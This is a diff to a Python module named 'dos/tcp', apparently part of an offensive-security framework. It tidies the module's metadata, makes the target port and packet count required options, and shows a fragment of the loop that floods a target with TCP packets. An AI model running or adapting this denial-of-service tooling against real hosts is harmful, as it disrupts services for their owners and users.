@@ -1,7 +1,6 @@
 import requests
 from rich.console import Console
 from rich.table import Table
-from scapy.all import TCP
 import socket
 import random
 
@@ -9,12 +8,13 @@ class Module:
     def __init__(self, logger):
         self.logger = logger
         self.name = "dos/tcp"
-        self.description = "TCP based dos attack."
-        self.author = "Onur Atakan ULUSOY"        
+        self.description = "TCP based DoS attack."
+        self.author = "Onur Atakan ULUSOY"
+        self.runauto = False        
         self.options = {
             "target": {"value": None, "required": True},
-            "port": {"value": 80, "required": False},
-            "amount": {"value": 1000, "required": True},
+            "port": {"value": None, "required": True},
+            "amount": {"value": None, "required": True},
         }
 
     def info(self):
@@ -54,6 +54,6 @@ class Module:
             # send the packets
             s.send(packet.encode())
         s.close()
-        print(f"\033[32m[+]\033[0m Finished tcp_dos DoS attack on {target}-{port}")
+        print(f"\033[32m[+]\033[0m Finished TCP based DoS attack on {target}-{port}")
 
 
